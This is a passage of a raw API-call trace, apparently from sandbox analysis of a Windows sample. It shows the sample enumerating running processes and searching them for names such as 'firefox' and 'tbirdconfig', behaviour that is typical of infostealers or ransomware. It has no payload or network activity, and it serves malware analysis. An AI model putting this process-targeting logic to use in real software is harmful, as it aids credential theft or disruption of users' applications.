th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0095.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.165] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3574688 [0095.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3574688, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0095.165] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0095.165] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="firefox") returned 0x0 [0095.165] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0095.166] CloseHandle (hObject=0x350) returned 1 [0095.167] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0095.187] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0095.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.188] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3574848 [0095.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3574848, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0095.189] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0095.189] StrStrIA (lpFirst="[System Process]", lpSrch="tbirdconfig") returned 0x0 [0095.189] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0095.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0095.191] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3547998 [0095.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3547998, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0095.191] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0095.191] StrStrIA (lpFirst="System", lpSrch="tbirdconfig") returned 0x0 [0095.191] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0095.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.192] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35729a8 [0095.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x35729a8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0095.192] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0095.192] StrStrIA (lpFirst="smss.exe", lpSrch="tbirdconfig") returned 0x0 [0095.192] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.194] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35729d8 [0095.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35729d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0095.194] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0095.194] StrStrIA (lpFirst="csrss.exe", lpSrch="tbirdconfig") returned 0x0 [0095.194] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0095.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.195] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572888 [0095.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3572888, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0095.195] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0095.195] StrStrIA (lpFirst="wininit.exe", lpSrch="tbirdconfig") returned 0x0 [0095.195] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.197] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35728b8 [0095.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35728b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0095.197] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0095.197] StrStrIA (lpFirst="csrss.exe", lpSrch="tbirdconfig") returned 0x0 [0095.197] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0095.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.199] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572a50 [0095.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3572a50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0095.199] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0095.199] StrStrIA (lpFirst="winlogon.exe", lpSrch="tbirdconfig") returned 0x0 [0095.199] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0095.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.200] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572918 [0095.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3572918, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0095.200] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0095.200] StrStrIA (lpFirst="services.exe", lpSrch="tbirdconfig") returned 0x0 [0095.200] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0095.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.202] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572930 [0095.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3572930, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0095.202] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0095.202] StrStrIA (lpFirst="lsass.exe", lpSrch="tbirdconfig") returned 0x0 [0095.202] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.203] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35727c8 [0095.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35727c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.203] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.203] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.203] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0095.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.204] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35729f0 [0095.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35729f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0095.205] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0095.205] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.205] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0095.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.206] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3572828 [0095.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3572828, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0095.207] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0095.207] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.207] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.208] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35729c0 [0095.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35729c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.208] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.208] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.208] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0095.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0095.209] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35372e8 [0095.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x35372e8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0095.209] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0095.209] StrStrIA (lpFirst="dwm.exe", lpSrch="tbirdconfig") returned 0x0 [0095.209] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5e, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.220] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572948 [0095.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572948, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.220] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.220] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.220] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.222] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35727e0 [0095.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35727e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.222] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.222] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.222] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.223] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572a08 [0095.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572a08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.223] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.223] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.223] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.225] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572a20 [0095.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572a20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.225] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.225] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.225] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.226] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572a38 [0095.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572a38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.226] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.226] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.226] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.227] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35728d0 [0095.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35728d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.227] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.227] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.228] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.229] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572840 [0095.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.229] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.229] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.229] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.230] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572900 [0095.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572900, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.230] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.230] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.230] 